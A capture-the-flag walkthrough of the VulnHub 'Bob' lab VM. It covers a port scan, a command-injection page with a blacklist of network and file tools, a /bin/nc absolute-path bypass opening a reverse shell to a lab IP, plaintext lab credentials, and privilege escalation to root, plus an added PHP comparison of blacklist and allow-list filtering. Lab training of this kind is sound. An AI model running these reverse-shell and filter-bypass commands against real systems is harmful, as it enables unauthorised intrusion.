Bob: 1.0.1
Download link
https://download.vulnhub.com/bob/Bob_v1.0.1.ova
Import the target machine's ova file into VMware and change the network adapter to bridged mode so it can be used directly.
1. Information gathering
Look up the IP address from the target machine's known MAC address.
Identify the target IP
Nmap -sP 192.168.43.0/24
Port scan
Nmap 192.168.43.169 -A -p- -oN nmap.A
C:\Users\ASUS>Nmap 192.168.43.169 -A -p- -oN nmap.A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-26 10:25 中国标准时间
Nmap scan report for Milburg-High (192.168.43.169)
Host is up (0.00069s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_ 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
MAC Address: 00:0C:29:FE:B2:D1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.69 ms Milburg-High (192.168.43.169)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.80 seconds
2. Website information
Directory scan with Yujian (御剑)
login.html is the admin login page
It seems to be unusable now
/index.html is the site home page
Try to access the directories exposed by the robots file
Found that /dev_shell.php can execute some commands
3. Penetration testing of the site
Capture the request with Burp
Found that some commands are filtered
Try to bypass the filter
Commands can be run by invoking the command interpreter under /bin
Look for sensitive files in the directory
dev_shell.php
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
    system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
    $is_he_a_bad_man = explode(' ', trim($command));
    //checks for dangerous commands
    if (in_array($is_he_a_bad_man[0], $bad_words)){
        system("echo Get out skid lol");
    }
    else{
        system($_POST['in_command']);
    }
}
?>
dev_shell.php.bak
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
    system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
    $is_he_a_bad_man = explode(' ', trim($command));
    //checks for dangerous commands
    if (in_array($is_he_a_bad_man[0], $bad_words)){
        system("echo Get out skid lol");
    }
    else{
        system($_POST['in_command']);
    }
}
?>
From the PHP code we can see
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
if (in_array($is_he_a_bad_man[0], $bad_words)){
    system("echo Get out skid lol");
}
else{
    system($_POST['in_command']);
}
that a blacklist filter is used, blocking only the following commands:
pwd
ls
netcat
ssh
wget
ping
traceroute
cat
nc
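The weakness of this filter is easier to see when it is run outside the web form. The following is an added example written for this writeup, not code from the Bob VM: it reproduces the page's blacklist check as a function and places an allow-list check beside it (an assumption about how a hardened version could look; the allowed programs date, uptime and id are made up), then runs both over constructed inputs, including the /bin/nc absolute-path bypass used in section 4.

```php
<?php
// Added example (not part of the Bob VM's dev_shell.php): the page's blacklist
// check factored into a function, next to an allow-list check that would have
// rejected the absolute-path bypass. Sample inputs below are constructed.

$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");

// The filter as written in dev_shell.php: returns true if the command would be executed.
// It only looks at the first space-separated token and compares it literally, so
// "/bin/nc" is never equal to "nc", and a tab or newline is not a separator either.
function blacklist_allows(string $command, array $bad_words): bool
{
    if (strpos($command, ';') !== false) {
        return false;
    }
    $tokens = explode(' ', trim($command));
    return !in_array($tokens[0], $bad_words);
}

// Hardened alternative (assumption, not the VM's code): a fixed list of allowed
// programs, no shell metacharacters at all, and the program name must be bare
// (no path), so "/bin/nc", "./nc" and "nc" are all treated the same way.
$allowed_programs = array("date", "uptime", "id");

function allowlist_allows(string $command, array $allowed): bool
{
    if (preg_match('/[;&|`$<>(){}\\\\\n\r]/', $command)) {
        return false;                       // anything that could reach the shell
    }
    $tokens = preg_split('/\s+/', trim($command));
    if ($tokens === false || $tokens[0] === '') {
        return false;                       // empty input
    }
    $program = $tokens[0];
    return $program === basename($program) && in_array($program, $allowed, true);
}

// Constructed inputs: the last one is the bypass shown in section 4 of this page.
$samples = array(
    "uptime",
    "ls -la",
    "id; ls",
    "/bin/nc -e /bin/bash 192.168.43.193 2222",
);
foreach ($samples as $cmd) {
    printf("%-42s blacklist: %-5s allowlist: %s\n", $cmd,
        blacklist_allows($cmd, $bad_words) ? "RUN" : "block",
        allowlist_allows($cmd, $allowed_programs) ? "RUN" : "block");
}
```

Run with the PHP CLI; the /bin/nc line is reported as RUN by the blacklist and block by the allow-list, which is the whole difference between the two approaches.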
4. Privilege escalation
Use the nc command to get a reverse shell
Start a listener on the local machine
nc -lvnp 2222
Send the command through Burp to trigger the reverse shell
/bin/nc -e /bin/bash 192.168.43.193 2222
Upgrade to an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
5. Information mining
A flag file is found in the root directory, but we have no read or write permission on it.
Sensitive file found in bob's home directory
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
jc's password is Qwerty
gpg file
Try to decrypt the gpg file (it cannot be decrypted without the key)
Found the key file (I did not expect the key to be hidden in an acrostic poem)
HARPOCRATES
6. Escalating privileges
Log in as user jc
Decrypt the gpg file
Use the key HARPOCRATES obtained earlier
Obtain bob's password: b0bcat_
Log in as bob
Log in as root
The password is bob's password
b0bcat_
View the flag